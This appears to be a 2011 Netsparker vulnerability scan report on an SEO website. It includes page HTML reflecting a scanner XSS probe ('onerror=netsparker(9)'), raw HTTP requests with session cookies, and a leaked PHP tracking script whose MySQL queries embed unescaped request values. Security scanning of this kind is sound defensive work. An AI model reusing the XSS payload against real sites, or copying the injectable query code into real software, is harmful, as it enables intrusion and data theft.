<div id="social-media-buttons">Share: <a href="http://www.facebook.com/share.php?u=<url>" onclick="return fbs_click()"><img src="http://www.seoq.com/wp-content/themes/seo-quotient-theme/images/facebook-share-button-seo-tool.gif" alt="share on facebook" width="30" height="31"/></a><a href="http://del.icio.us/post?url=http://www.seo-quotient.com"><img src="http://www.seoq.com/wp-content/themes/seo-quotient-theme/images/delicious-share-button-seo-tool.gif" alt="Share on Delicious" width="29" height="31"/></a><a href="http://www.stumbleupon.com/submit?url=www.seo-quotient.com"><img src="http://www.seoq.com/wp-content/themes/seo-quotient-theme/images/stumbleupon-share-button-seo-tool.gif" alt="Share on Stumble Upon" width="30" height="31"/></a><a href="http://twitter.com/home?status=SEO Quotient, online SEO tool - www.seo-quotient.com"><img src="http://www.seoq.com/wp-content/themes/seo-quotient-theme/images/twitter-share-button-seo-tool.gif" alt="Share on Twitter" width="29" height="31"/></a>

</div>
<div class="google_form">
<form id="cse-search-box" action="http://www.seoq.com/search-results/">
<input type="hidden" value="002680724730993913492:hys1pl1blsa" name="cx" />
<input type="hidden" value="FORID:10" name="cof" />
<input type="hidden" value="UTF-8" name="ie" />
<input type="text" id="search-google" size="" name="q" style="border: 1px solid rgb(126, 157, 185); padding: 2px;" />
<input type="submit" id="submit-google" value="Search" name="sa" />
<input type="hidden" name="siteurl" value="www.seoq.com/" />
<input type="hidden" name="siteurl" value="www.seoq.com" /></form>
<script src="http://www.google.com/cse/brand?form=cse-search-box&lang=en" type="text/javascript"></script>
</div>
</div>
<div id="navbar">
<ul id="menu"> <li><a href="http://www.seoq.com/about-seo-quotient" title="About">About Us</a></li> <li><a href="http://www.seoq.com/web/professionals" title="Directory">Directory</a></li> <li class="current_page_item"> <a href="http://www.seoq.com/quotient" title="SEO Tools">SEO Tools</a> <ul class='children'> <li class="page_item page-item-2306"><a href="/quotient/analysis" title="SEO Analysis Tool">SEO Analysis Tool</a></li> <li class="page_item page-item-2291"><a href="/searchengine-analysis/" title="Technical SEO Analysis">Technical SEO Analysis</a></li> <li class="page_item page-item-2295"><a href="/blvdstatus/" title="Real-time Web Analytics">Real-time Web Analytics</a></li> <li class="page_item page-item-2299"><a href="/webstatshq/" title="Traffic Ranking Software">Traffic Ranking Software</a></li> </ul> </li> <li><a href="http://www.seoq.com/blog" title="Blog">Blog</a></li> <li> <a href="http://www.seoq.com/7-c-of-online-marketing-seo" title="SEO Tools">7 C’s</a> <ul class='children'> <li class="page_item page-item-2244"><a href="/7-c-of-online-marketing-seo/crawlability/" title="Crawlability">Crawlability</a></li> <li class="page_item page-item-2285"><a href="/7-c-of-online-marketing-seo/credibility/" title="Credibility">Credibility</a></li> </ul> </li> <li><a href="http://www.seoq.com/web/" title="Discussions">Discussions</a></li> </ul> </div>
<div id="rss-header"><a href="http://www.seoq.com/feed/"><img width="27" height="25" alt="RSS feed" src="http://www.seoq.com/wp-content/themes/seo-quotient-theme/images/rss-button-seo-tool.png" /></a></div>
<div id="secondary-menu" class="login"> <a href="http://www.seoq.com/web/users/login" title="Login">Login</a> <a href="http://www.seoq.com/web/users/register" title="Sign Up">Sign Up</a> </div> </div>
<div id="content-top-wrap">
<div id="content-bottom-wrap">
<div id="content">

<script type="text/javascript">function fbs_click() {u=location.href;t=document.title;window.open('http://www.facebook.com/sharer.php?u='+encodeURIComponent(u)+'&t='+encodeURIComponent(t),'sharer','toolbar=0,status=0,width=626,height=436');return false;}</script><script type="text/javascript" src="http://www.highcharts.com/highslide/highslide-full.min.js"></script><script type="text/javascript" src="http://www.highcharts.com/highslide/highslide.config.js" charset="utf-8"></script><link rel="stylesheet" type="text/css" href="http://www.highcharts.com/highslide/highslide.css" /><script type="text/javascript"> $(function() { $("#tabs").tabs(); }); function fbs_click() {u='http://www.seoq.com/quotient/2011/05/01/2837/><iMg src=N onerror=netsparker(9)>';t='facebook_status';window.open('http://www.facebook.com/sharer.php?u='+encodeURIComponent(u)+'&t='+encodeURIComponent(t),'sharer','toolbar=0,status=0,width=626,height=436');return false;} $(function() { $(".report").hide(); $("#highLevelReport").hide(); $("#reportDoesNotExist").show(); }); </script> <div id="reportDoesNotExist" class="ui-tabs-panel"> <div class="share-buttons"> <p></p> <div class="share"></div> </div> <div class="clear"></div> <div id="entry-summary"> <p><strong>Report not found</strong> Please check the URL.<br /><br /> URL for this report:<a href="http://www.seoq.com/quotient/2011/05/01/2837/><iMg src=N onerror=netsparker(9)>" title="SEO Quotient for ">http://www.seoq.com/quotient/2011/05/01/2837/><iMg src=N onerror=netsparker(9)>ddd</a> </p> </div> </div> <div id="entry-summary"> <p>SEO Quotient™ website analysis of: <strong></strong><br /> URL for this report: <a href="http://www.seoq.com/quotient/2011/05/01/2837/><iMg src=N onerror=netsparker(9)>" title="SEO Quotient for ">http://www.seoq.com/quotient/2011/05/01/2837/><iMg src=N onerror=netsparker(9)></a></p> <p>This URL has been analyzed: 0 times </p> </div><div class="report"> <div id="highLevelReport"> <div class="info-1"> <div class="grid-1"> <h3>Crawlability </h3> <div id="chart_crawlability">Crawlability Score</div> <br /> <h4>Section 1: Crawlability</h4> <p>Crawlability is how easy it is for search engine spiders and robots to get inside your website ... scan the words, photos and videos and index that information in its archives...</p> <ul><li><a href="#crawlabilityDetail">(See Crawlability details)</a></li></ul> </div> <div class="grid-1"> <h3>Credibility </h3> <div id="chart_credibility">Credibility Score</div> <br /> <h4>Section 2: Credibility</h4> <p>Credibility has a lot to do with what other people, bloggers and webmasters have to say about you. For example, the more references or citations to your website, the more credibility you have...</p> <ul><li><a href="#credibilityDetail">(See Credibility details)</a></li></ul> </div> <div class="grid-1 alpha"> <h3>Code </h3> <div id="chart_code">Code Score</div> <br /> <h4>Section 3: Code</h4> <p>Code refers to the extra emphasis you place on Content behind the scene. It involves meta tags, title tags, headings, hyperlinks, bullet lists and other techniques to bring more attention to specific words...</p> <ul><li><a href="#codeDetail">(See Code details)</a></li></ul> </div> </div> <div class="info-1"> <h3>Content </h3> <p>Content is the actual words, pictures, charts, graphs and videos you have. The only way search engines can determine how relevant you are vis-a-vis a search it to study the content on your website... </p> <table> <tr id="charts-row"> <td><div id="keywords_graph" style="width: 300px; height: 200px; margin: 0 auto"></div></td> <td><div id="doublePhrase_graph" style="width: 400px; height: 200px; margin: 0 auto"></div></td> </tr> </table> <ul><li><a href="#contentDetail">(See Content details)</a></li></ul> </div> <div class="clear"></div> </div><script type="text/javascript"> var chart_crawlability = new FusionCharts("/quotient/scores/AngularGauge.swf", "ChId1", "240", "155", "0", "1"); chart_crawlability.setDataURL("http://www.seoq.com/quotient/webanalytics/score_in_xml//Crawlability/14"); chart_crawlability.render("chart_crawlability"); var chart_credibility = new FusionCharts("/quotient/scores/AngularGauge.swf", "ChId1", "240", "155", "0", "1"); chart_credibility.setDataURL("http://www.seoq.com/quotient/webanalytics/score_in_xml//Credibility/5"); chart_credibility.render("chart_credibility"); var chart_code = new FusionCharts("/quotient/scores/AngularGauge.swf", "ChId1", "240", "155", "0", "1"); chart_code.setDataURL("http://www.seoq.com/quotient/webanalytics/score_in_xml//Code/6"); chart_code.render("chart_code");</script> <a name="crawlabilityDetail"></a><h2>Crawlability</h2> <div id="crawlabilityDetail"> <div class="share-buttons"> <p>Share this report on:</p> <div class="share"> <ul> <li><a onclick="return fbs_click()" title="facebook share" href="http://www.facebook.com/share.php?u=<url>" target="_blank"> <img src="http://www.seoq.com/quotient/img/facebook.jpg" width="28" height="28" alt="Share on Facebook" /></a> </li> <li><a href="http://twitter.com/home?status=Check my SEO at - http://www.seoq.com/quotient/2011/05/01/2837/><iMg src=N onerror=netsparker(9)>" target="_blank" title="twitter share" > <img src="http://www.seoq.com/quotient/img/twitter.jpg" width="28" height="28" alt="Share on twitter" /></a> </li> <li><a href="http://www.linkedin.com/shareArticle?mini=true&url=http%3A%2F%2Fwww.seoq.com%2Fquotient%2F2011%2F05%2F01%2F2837%2F%3E%3CiMg+src%3DN+onerror%3Dnetsparker%289%29%3E&title=SEO+Quotient%EF%BF%BD+Diagnostic+Report&summary=&source=seoq.com" target="_blank" title="linkedin share"> <img src="http://www.seoq.com/quotient/img/linkedin.jpg" width="28" height="28" alt="Share on LinkedIn" /></a> </li> <li><a href="http://digg.com/submit?phase=2&url=http://www.seoq.com/quotient/2011/05/01/2837/><iMg src=N onerror=netsparker(9)>&title=SEO Quotient� Diagnostic Report&bodytext=" target="_blank" title="digg share"> <img src="http://www.seoq.com/quotient/img/digg.jpg" width="28" height="28" alt="Share on Digg" /></a> </li> <li><a href="http://www.stumbleupon.com/submit?url=http%3A%2F%2Fwww.seoq.com%2Fquotient%2F2011%2F05%2F01%2F2837%2F%3E%3CiMg+src%3DN+onerror%3Dnetsparker%289%29%3E&title=stumbleupon_title" target="_blank" title="stumbleupon share"> <img src="http://www.seoq.com/quotient/img/stumbleupon.jpg" width="27" height="28" alt="Share on StumbleUpon" /></a> </li> <li><a href="http://technorati.com/faves?add=http://www.seoq.com/quotient/2011/05/01/2837/><iMg src=N onerror=netsparker(9)>" target="_blank" title="technorati share"> ..

[Possible] PHP Source Code Disclosure

27 TOTAL

MEDIUM

Netsparker identified a web page that discloses PHP (server side) source code. An attacker can obtain server side source code of web application, which can contain sensitive data such as database connection strings, usernames and passwords along with the technical and business logic of the application.

Impact

Depending on the source code, database connection strings, username and passwords, internal workings and business logic of application can be revealed. With such information an attacker can mount the following types of attacks:

Access the database or other data resources. Depending on the privileges of the account obtained from source code, it may be possible to read, update or delete arbitrary data from the database.
Gain access to password protected administrative mechanisms such as dashboards, management consoles and admin panels, hence gaining full control of the application.
Develop further attacks by investigating the source code for input validation errors and logic vulnerabilities.

Actions to Take

Where the file is not required delete it form the server, where such files are required ensure that its permissions prevent users from accessing it via the web server.
Ensure that the web server security patches are up to date and the latest stable version of the web server software is in use.
Remove all temporary and backup files from the server.

Required skills for successful exploitation

This is dependent on the information obtained from source code. Uncovering these forms of vulnerabilities does not require high levels of skills. However a highly skilled attacker could leverage this form of vulnerability to obtain account information for databases or administrative panels, ultimately leading to control of the application or even the host the application reside on.

External References

Secureyes

- /wp-content/plugins/vipers-video-quicktags/readme.txt

/wp-content/plugins/vipers-video-quicktags/readme.txt

http://www.seoq.com/wp-content/plugins/vipers-video-quicktags/readme.txt

Request

GET /wp-content/plugins/vipers-video-quicktags/readme.txt HTTP/1.1
Referer: http://www.seoq.com/wp-content/plugins/vipers-video-quicktags/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.seoq.com
Cookie: PHPSESSID=sgei1l6e3nst43jti7f9ug76f0; CAKEPHP=3gmt3q74fne0s72akqsevm8685; temp_orgid=18bc00d6479f52c3222ea5887bfd07d0; temp_userid=42eb0c6051822e446cfea254f0248163
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:34:05 GMT
Server: Apache
Last-Modified: Tue, 24 Aug 2010 18:37:50 GMT
ETag: "39e080a-5166-48e960fe8db80"
Accept-Ranges: bytes
Content-Length: 20838
Keep-Alive: timeout=15, max=49
Connection: Keep-Alive
Content-Type: text/plain; charset=UTF-8

=== Viper's Video Quicktags ===
Contributors: Viper007Bond
Donate link: http://www.viper007bond.com/donate/
Tags: video, quicktags, wysiwyg, tinymce, youtube, google video, dailymotion, vimeo, veoh, viddler, metacafe, blip.tv, flickr, ifilm, myspace, flv, quicktime
Requires at least: 2.8
Tested up to: 3.0.1
Stable tag: trunk

Allows easy and XHTML valid posting of videos from various websites such as YouTube, DailyMotion, Vimeo, and more.

== Description ==

Tired of copying and pasting the embed HTML from sites like YouTube? Then this plugin is for you.

Just simply click one of the [new buttons](http://wordpress.org/extend/plugins/vipers-video-quicktags/screenshots/) that this plugin adds to the write screen (rich editor included) and then paste the URL that the video is located at into the prompt box -- easy as that. You can fully configure how the videos are displayed (width, height, colors, alignment on the page) and much more. Your site will even stay (X)HTML valid unlike with the code provided by most video sites.

Currently supports these video sites:

* [YouTube](http://www.youtube.com/) (including playlists)
* [Google Video](http://video.google.com/)
* [DailyMotion](http://www.dailymotion.com/)
* [Vimeo](http://www.vimeo.com/)
* [Veoh](http://www.veoh.com/)
* [Viddler](http://www.viddler.com/)
* [Metacafe](http://www.metacafe.com/)
* [Blip.tv](http://blip.tv/)
* [VideoPress aka WordPress.com Video](http://videopress.com/) **NEW!**
* [Flickr](http://www.flickr.com/) videos
* [Spike.com/IFILM](http://www.spike.com/)
* [MySpaceTV](http://vids.myspace.com/)

As well as these file types:

* Flash Video Files (FLV)
* QuickTime (MOV, etc.)
* Generic video files (AVI, MPEG, WMV, etc.)

You can also use the `[flash]` shortcode to Flash-based video from **any** website (see Help section after installing for details).

If your favorite video site is not supported, please see [the FAQ](http://wordpress.org/extend/plugins/vipers-video-quicktags/faq/) for details on how to get me to include it.

== Installation ==

###Updgrading From A Previous Version###

To upgrade from a previous version of this plugin, delete the entire folder and files from the previous version of the plugin and then follow the installation instructions below.

###Installing The Plugin###

Extract all files from the ZIP file, **making sure to keep the file structure intact**, and then upload it to `/wp-content/plugins/`. This should result in multiple subfolders and files.

Then just visit your admin area and activate the plugin.

**See Also:** ["Installing Plugins" article on the WP Codex](http://codex.wordpress.org/Managing_Plugins#Installing_Plugins)

###Installing For [WordPress MU](http://mu.wordpress.org/)###

Install as stated above to `plugins`, but place `vipers-video-quicktags.php` in the `mu-plugins` folder. Just that file, nothing else.

###Plugin Configuration###

To configure this plugin, visit it's settings page. It can be found under the "Settings" tab in your admin area, titled "Video Quicktags".

== Frequently Asked Questions ==

= The videos won't show up. Only a YouTube image or a link to the video does. =

Your theme lacks the `<?php wp_head(); ?>` hook. Please add it right before `</head>` in your theme's `header.php` file.

= I have the plugin running, but I have some questions about how to use it. =

A help section is now included with this plugin. Please visit your admin area -> Settings -> Video Quicktags -> Help.

= Why doesn't this plugin support such-and-such site? =

There are few possible reasons for this:

* I may have never heard of the site and simply linking it to me on [my WordPress plugin forums](http://www.viper007bond.com/wordpress-plugins/forums/viewforum.php?id=23) may make me include it in a future release.
* The URL at which the video can be viewed has nothing in common with the embed URL. This means my plugin can't do anything with the URL you give it. Support for fetching the emded URL from the website may be added in a future version though, we'll see.
* I have deemed the site not popular enough to warrant being added to my plugin. I don't wish to bloat my plugin with tiny little sites that only one or two people will use.

= Does this plugin support other languages? =

Yes, it does. Included in the `localization` folder is the translation template you can use to translate the plugin. See the [WordPress Codex](http://codex.wordpress.org/Translating_WordPress) for details. When you're done translating it, please [send me](http://www.viper007bond.com/contact/) the translation file so I can include it with the plugin.

= Where can I get additional support for this plugin? =

This is a free plugin and as such, you aren't guaranteed support. However I do my best to answer support questions. Just post on the [WordPress.org support forums](http://wordpress.org/tags/vipers-video-quicktags).

= I love your plugin! Can I donate to you? =

Sure! I do this in my free time and I appreciate all donations that I get. It makes me want to continue to update this plugin. You can find more details on [my donate page](http://www.viper007bond.com/donate/).

== Screenshots ==

1. TinyMCE, the plugin's buttons, and the plugin's dialog window.
2. YouTube configuration page.
2. DailyMotion configuration page with Farbtastic color picker showing.

== Changelog ==

= v6.3.0 =

* **Vimeo:** Implement their new `iframe`-based embed since they seem to have broken my previous embed method.

= v6.2.19 =

* **General:** Remove potentially buggy SWFObject registration.

= v6.2.18 =

* **VideoPress:** If the [official VideoPress plugin](http://wordpress.org/extend/plugins/video/) is installed, don't take over it's shortcode.

= v6.2.17 =

* **TinyMCE:** Re-enable the third button row as not everyone was having issues with it. Default to the first row though.

= v6.2.16 =

* Default to less buttons being enabled by default due to not being able to put them on their own line anymore.

= v6.2.15 =

* **TinyMCE:** Trying to inject the buttons onto the third button line completely breaks TinyMCE. Only allow them to be added to the first or second line, and even then they may not show up even then. I have no idea why (I hate TinyMCE) and I frankly don't care at this point (they're going away in v7.0).

= v6.2.14 =

* **FLV:** Fix automatic images and make them work better.

= v6.2.13 =

* **FLV:** Make MP3's stream properly by not setting the image value to the MP3. Props [tranified](http://wordpress.org/support/topic/327598).

= v6.2.12 =

* **VideoPress:** Width/height parameter improvements.

= v6.2.11 =

* **FLV:** Allow periods in Flashvar names. See [http://wordpress.org/support/topic/316159](http://wordpress.org/support/topic/316159).

= v6.2.10 =

* **General:** Change default feed link text. Always wrap in paragraph tags regardless. Props [andrewpaulbiss](http://wordpress.org/support/topic/314764).
* **General:** Fiddle with how settings are created.

= v6.2.9 =

* **General:** SWFObject issue was likely WordPress version related. I'm tired of dealing with older versions of WordPress anyway, not to mention they're insecure. Make VVQ only support WordPress 2.8+. It's for their own good.

= v6.2.8 =

* **General:** Revert SWFObject enqueue hack as it's failing for some users.

= v6.2.7 =

* **General:** Update SWFObject to version 2.2.
* **General:** Update JW Player to version 4.5.
* **Localization:** Added Chinese translation thanks to [Dreamcolor](http://dreamcolor.net/).
* **Localization:** Added Spanish translation thanks to [Omi](http://equipajedemano.info/).

= v6.2.6 =

* **General:** Fixed an issue with pingback sending failing. The remote XML-RPC would check the referring site (your site) for the ping-to URL and due to an apostrophe in an HTML comment, it'd fail. Very, very weird. Thanks to Robert Windisch of [Inpsyde](http://inpsyde.com/)!

= v6.2.5 =

* **Localization:** Added Hungarian translation thanks to [jamesb](http://filmhirek.com/).

= v6.2.4 =

* **VideoPress:** Rebrand everything in the plugin to VideoPress rather than like WordPress.com video.

= v6.2.3 =

* **Localization:** Added Belorussian translation thanks to Fat Cow.

= v6.2.2 =

* **Localization:** Added Brazilian Portuguese translation thanks to Ricardo Martins.
* **General:** Change `wmode` from `opaque` to `transparent` to allow transparency in FLV skins as well as other embeds.
* **General:** Enable `allowscriptaccess` so Javascript can interact with the embeds.
* **FLV:** Fix an upgrade bug with custom colors.

= v6.2.1 =

* **General:** Fix broken image URLs. Props marian.

= v6.2.0 =

* **WordPress.com Video:** Added support for [WordPress.com Video shortcodes](http://support.wordpress.com/videos/).
* **FLV:** Reorder Flashvar building to properly allow overriding.
* **FLV:** New skins.
* **General:** Pass the non-defaulted attributes (i.e. those directly passed to the shortcode function) to the `vvq_shortcodeatts` filter.

= v6.1.25 =

* **General:** Fix bug introduced in v6.1.24 that made it impossible to post multiple videos in one post.

= v6.1.24 =

* **General:** Improvements to avoid object ID collisions.
* **Dailymotion:** Update preview video as old one was removed.

= v6.1.23 =

* **YouTube:** Add the ability to enable "HD" by default. This does not affect the "HQ" button as I don't know of a way to enable that by default. Also remember that not all videos support HD (few do actually, most only support nothing or HQ).
* **YouTube:** Changed the default preview video to one that supports HD.
* **General:** Remove many bundled jQuery UI libraries, Farbtastic, and other items that are now bundled with WordPress.
* **General:** Code improvements and bugfixes.

= v6.1.22 =

* **General:** Wrap the default feed placeholder text in paragraph tags (the vast majority of people place videos on their own line).

= v6.1.21 =

* **General:** Use a predictable ID for the placeholders and videos rather than a randomly generated one.
* **General:** PHP notice fixes.

= v6.1.20 =

* **Localization:** Added Danish transation thanks to Georg.
* **Localization:** Updated Italian translation thanks to Gianni Diurno.

= v6.1.19 =

* **Quicktime:** Added "scale=aspect" setting as apparently it's best to have.

= v6.1.18 =

* **YouTube:** Added support for the URL format used in the YouTube RSS feed: http://youtube.com/?v=XXXXXXXXXX

= v6.1.17 =

* **YouTube:** Removed all quality related features/options. YouTube now natively supports a high quality toggle in it's embed allowing the user to toggle (if the video supports it). Haven't found a way to make high quality the default yet though.

= v6.1.16 =

* **YouTube:** Add option to disable the video title and ratings display.
* **Veoh:** Add support for the new URL format.
* **General:** Additional styling updates for WordPress 2.7.

= v6.1.15 =

* **FLV:** Support (and detect) RTMP streams. Props axelseaa.
* **General:** Tweak the redirect that occurs after saving the settings.

= v6.1.14 =

* **Google Video:** Show the fullscreen button by default, add option to disable it.

= v6.1.13 =

* **YouTube:** Remove the new search box by default. Option to enable it is on the settings page.

= v6.1.12 =

* **General:** Fix a PHP parse error that slipped into 6.1.11. Whoops!

= v6.1.11 =

* **General:** Don't hijack the `kml_flashembed` shortcode if it's already being processed by other plugin.

= v6.1.10 =

* **General:** Icon for WordPress 2.7.
* **General:** Translation and notice bugfixes from Laurent Duretz.
* **Localization:** French translation thanks to Laurent Duretz.
* **Localization:** Dutch translation thanks to Sypie.

= v6.1.9 =

* **YouTube:** Add support for YouTube's new experimental HD-ish video.
* **General:** Don't right-position the PayPal button as it covers up the "Help" tab in WordPress 2.7.

= v6.1.8 =

* **Metacafe:** Update regex to match new URL format. Props penalty.

= v6.1.7 =

* **General:** CSS tweak for WordPress 2.7. Probably will need more updating, but I'll wait for 2.7 to be done first.
* **YouTube:** Remove MP4 option from settings page (you can't seek properly with it it seems), plus it's meant for the iPhone.

= v6.1.6 =

* **YouTube:** Default to low quality videos (what YouTube's standard embed code does). The high quality video "hack" can result in "This video is not available" on certain videos.

= v6.1.5 =

* **Veoh:** Support for a default image in the `[flv]` shortcode when using a `.mp4` video file.

= v6.1.4 =

* **Veoh:** Fix broken embeds.

= v6.1.3 =

* **General:** Actually remove the `wp_head()` check (I failed to do it properly in 6.1.2).
* **General:** Don't show the binary FTP warning for WordPress 2.7 (the bug should be fixed).

= v6.1.2 =

* **General:** Remove `wp_head()` warning for admins. Doesn't work in themes like K2. Plugin's FAQ should cover this.
* **General:** Add a filter to the shortcode attributes. This means plugins/themes can adjust things like the width automatically.
* **Localization:** Russian translation thanks to [Dennis Bri](http://handynotes.ru/)
* **General:** Properly hide some images in the admin that are there for pre-loading.

= v6.1.1 =

* **Vimeo:** Fixed embeds. Vimeo apparently doesn't like having `&`s in it's embed URLs, so I've switched to using Flashvars.
* **Viddler:** Decode TinyMCE's `&` to `&` conversions which were breaking the embeds.
* **Flash:** Decode TinyMCE's `&` to `&` conversions which were breaking the embeds.

= v6.1.0 =

* **YouTube:** Can now choose between high quality FLV and high quality MP4 formats.
* **FLV:** Bundled skins.
* **FLV:** Improvements on how custom colors are set.
* **TinyMCE:** Can now choose what line number to display the buttons on.
* **TinyMCE:** Automatic browser cache breaking when the plugin is (de)activated or the line number is changed.
* **General:** SWFObject calls moved to bottom of posts rather than theme footer.
* **General:** Admin notice warning about automatic plugin upgrade breaking SWF files, etc. (ASCII vs. binary).
* **General:** Ability to set custom feed text via settings page.
* **General:** Image pre-cache URL fix.
* **General:** Settings page improvements for users without Javascript.
* **General:** More Localization and translators added to credits page.
* **General:** Redid admin warning message for users without the head hook.
* **Flash:** Aliased "kml_flashembed" shortcode and "movie" parameter now used if it's there. This is to support Anarchy Media Player.
* Other various bug fixes.

= v6.0.3 =

* Undo formatting applied by `wptexturize()` to the URLs of videos. Props to [nukerojo](http://freddiemercury.com.ar/) for reporting.

= v6.0.2 =

* Fix Write -> Page (forgot to hook in)
* Remove FLV notice from WPMU.
* Add help item about the red in YouTube (hovering over icons).

= v6.0.1 =

* Fixed a PHP error.

= v6.0.0 =

Complete recode literally from scratch (all new code):

* Support for new video sites.
* Settings page greatly expanded.
* Video configuration abilities greatly expanded (colors, etc.)
* YouTube playlists
* And so very, very much more.

= v5.4.4 =

* Add the Quicktime and generic video buttons back to TinyMCE for users who prefer them over the native TinyMCE embedder.

= v5.4.3 =

* More code changes to try and fix hard-to-reproduce bugs under WordPress 2.5. Thanks to everyone that helped me debug including [Maciek](http://ibex.pl).

= v5.4.2 =

* Some code to hopefully fix some seemingly random bugs under WordPress 2.5.
* Other minor code improvements.

= v5.4.1 =

* Video alignment wasn't working due to the switch to SWFObject. This has been fixed. Props to [zerocrash](http://www.zerocrash.dk/) for the bug report.

= v5.4.0 =

This is a hotfix version to address WordPress 2.5 plus some bugfixes and such. A minor recode of this plugin is planned to improve it, mainly the video file support.

* Updated to support WordPress 2.5 and it's TinyMCE 3 (required a whole new TinyMCE plugin to be written).
* Switched from UFO to SWFObject for the embedding of Flash video (YouTube, etc.) since UFO is deprecated.
* Update of FLV player SWF file.
* Removed Stage6 due to site shutdown. BBCode usage now displays an error message.

= v5.3.1 =

* Replace BBCode with the video in the excerpt.

= v5.3.0 =

* Manjor and multiple Stage6 improvements. Props Randy A. for pointing out that it wasn't working in some cases.
* The regex can now be filtered via `vvq_searchpatterns`. This means plugins can add in new BBCodes without having to edit the plugin. See plugin source for format.
* Other minor improvements.

= v5.2.3 =

* When a custom width is entered into the prompt, use math to suggest a matching height value.

= v5.2.2 =

* Support for the `http://www.youtube.com/w/?v=JzqumbhfxRo` URL format for YouTube due to popular request.

= v5.2.1 =

* Support for new Vimeo URL format (no `/clip:XXX`). Thanks to texasellis.

= v5.2.0 =

* [Stage6](http://stage6.divx.com/) support.
* Regex fix for Metacafe.

= v5.1.6 =

* The default height for YouTube videos has changed, so plugin updated to match.

= v5.1.5 =

* Plugin now parses the code inside text widges, i.e. you can embed videos in your sidebar!

= v5.1.4 =

* Missed a regex expression for the international YouTube handling, whoops!

= v5.1.3 =

* YouTube.com regional support (uk.youtube.com, etc.)
* WPMU support hopefully..

- /blvdstatus/js/dynamicJS.php_2008_04_30

/blvdstatus/js/dynamicJS.php_2008_04_30

http://www.seoq.com/blvdstatus/js/dynamicJS.php_2008_04_30

Request

GET /blvdstatus/js/dynamicJS.php_2008_04_30 HTTP/1.1
Referer: http://www.seoq.com/blvdstatus/js/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.seoq.com
Cookie: PHPSESSID=sgei1l6e3nst43jti7f9ug76f0; CAKEPHP=3gmt3q74fne0s72akqsevm8685; temp_orgid=18bc00d6479f52c3222ea5887bfd07d0; temp_userid=42eb0c6051822e446cfea254f0248163
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:34:15 GMT
Server: Apache
Last-Modified: Fri, 25 Apr 2008 21:40:53 GMT
ETag: "254800e-17e3-44bb96b980340"
Accept-Ranges: bytes
Content-Length: 6115
Keep-Alive: timeout=15, max=91
Connection: Keep-Alive
Content-Type: text/plain; charset=UTF-8

<?php
header('Content-type: text/javascript');

require_once("../inc/serverSetup.php");
require_once("../inc/database.php");

require_once("../lib/processing/findSearchEngineData.php");

import_request_variables('g', 'in_');

// Query the referrer URL (which in this case is the current page
// on the client's site) and visitor's IP address
$currentUrl = $_SERVER['HTTP_REFERER'];
$ip = $_SERVER['REMOTE_ADDR'];

// Title of the page
if (!isset($in_title)) {
$in_title = '';
}

// blvdC - Campaign ID, if any
if (!isset($in_blvdC)) {
$in_blvdC = 0;
}

if (isset($in_screenWidth)) {
$in_screenWidth = (int)$in_screenWidth;
} else {
$in_screenWidth = 0;
}
if (isset($in_screenHeight)) {
$in_screenHeight = (int)$in_screenHeight;
} else {
$in_screenHeight = 0;
}
if (isset($in_screenDepth)) {
$in_screenDepth = (int)$in_screenDepth;
} else {
$in_screenDepth = 0;
}

$userAgent = mysql_escape_string($_SERVER['HTTP_USER_AGENT']);
echo "//UA: $userAgent\n";

// If we have received a session id, maintain it, otherwise
// generate a new one
if (isset($in_blvdSessionId)) {
$sessionId = $in_blvdSessionId;
} else {
$sessionId = '';
}

// Convert the domain name into a domain ID
// (If this fails, the domain ID will remain set to 0)
$domainId = 0;

$domainIdResults = mysql_query(
"SELECT ConvertDomainNameToDomainID(DomainNameFromURL('$currentUrl')) AS `ID`"
);

// Tread carefully here, so errors don't break tracking!
if (mysql_errno() == 0) {
$domainIdData = mysql_fetch_object($domainIdResults);
if ($domainIdData) {
$domainId = $domainIdData->ID;
}
}

// If this is a new session, generate a unique ID for it, and store it in
// the database
if ($sessionId == '') {
$sessionId = uniqid("", true);

// Bind the session ID to the user's IP address
mysql_query(
<<<EOQ
INSERT INTO `sessions`(
SessionID, IPAddress, SessionStartTime, ReferringURL, DomainID,
ScreenWidth, ScreenHeight, ScreenDepth, UserAgent
)
VALUES(
'$sessionId', '$ip', UNIX_TIMESTAMP(), '$in_referrer', '$domainId',
'$in_screenWidth', '$in_screenHeight', '$in_screenDepth', '$userAgent'
)
EOQ
);

// If necessary, store the user agent information in the 'user_agent_data'
// table.
$ua = get_browser($userAgent);
$browserName = mysql_escape_string($ua->browser);
$browserVersion = mysql_escape_string($ua->version);
$platform = mysql_escape_string($ua->platform);

mysql_query(
<<<EOQ
INSERT IGNORE INTO `user_agent_data`(
`UA`, `BrowserName`, `BrowserVersion`, `Platform`
)
VALUES(
'$userAgent', '$browserName', '$browserVersion', '$platform'
)
EOQ
);
}

// *********************************
// Process campaigns for this domain
// *********************************

$matchedCampaigns = array();

echo "//DID: $domainId\n";

// Retrieve all of the campaigns
if ($domainId > 0) {
$campaignResults = mysql_query(
"SELECT * FROM `campaigns` WHERE `DomainID` = '$domainId'"
);

while($campaign = mysql_fetch_object($campaignResults)) {
echo "//$campaign->Title ($campaign->IdentifierType)\n";

if ($campaign->IdentifierType == 'Parameter') {
// Parameter-based campaign
echo "//Parameter based.\n";

$matched = false;

// Does the URL match the base URL defined by the
// campaign? (Skip this step if the URL is defined as '*')
if ($campaign->URL != '*') {
// TODO
}

// Parse the URL and extract the query string
$queryString = substr(
$currentUrl,
strpos($currentUrl, '?') + 1
);

$parameters = array();
parse_str($queryString, &$parameters);

// Check if the parameter to check exists and then
// check if it is equal to the defined value
if (isset($parameters[$campaign->ParameterToCheck])) {
if ($parameters[$campaign->ParameterToCheck] == $campaign->ValueToCheck) {
$matched = true;
}
}

// If we matched, add the campaign ID to the campaign list
if ($matched) {
echo "//Matched\n";
$matchedCampaigns[] = $campaign->ID;
}
} else if ($campaign->IdentifierType == 'URL') {
// Are we checking the current or referring URL? If not, this
// campaign will need to be handled by the "leave.php" script!
if ($campaign->TriggerType == 'CurrentPage') {
$urlToCheck = $currentUrl;
} else if ($campaign->TriggerType == 'CameFrom') {
$urlToCheck = $in_referrer;
} else {
continue;
}

